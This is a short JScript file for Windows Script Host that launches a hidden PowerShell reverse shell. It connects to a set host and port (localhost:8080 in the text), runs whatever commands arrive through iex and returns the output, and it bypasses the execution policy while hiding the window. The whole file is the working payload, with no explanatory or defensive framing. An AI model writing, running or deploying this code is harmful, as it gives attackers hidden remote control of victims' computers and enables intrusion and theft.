(function () {
    var host = "127.0.0.1";
    var port = 8080;

    var psCode = "$c=New-Object Net.Sockets.TcpClient('" + host + "'," + port + ");$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1|Out-String);$sb2=$sb+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sendbyte,0,$sendbyte.Length);$s.Flush()};$c.Close()";

    // Escaped for shell.Run() - use ^" for inner quotes
    var cmd = "powershell.exe -NoProfile -ep bypass -w hidden -c ^\"" + psCode + "^\"";

    var shell = new ActiveXObject("WScript.Shell");
    shell.Run(cmd, 0, false);

    WScript.Sleep(1000);  // Give it time to connect
})();
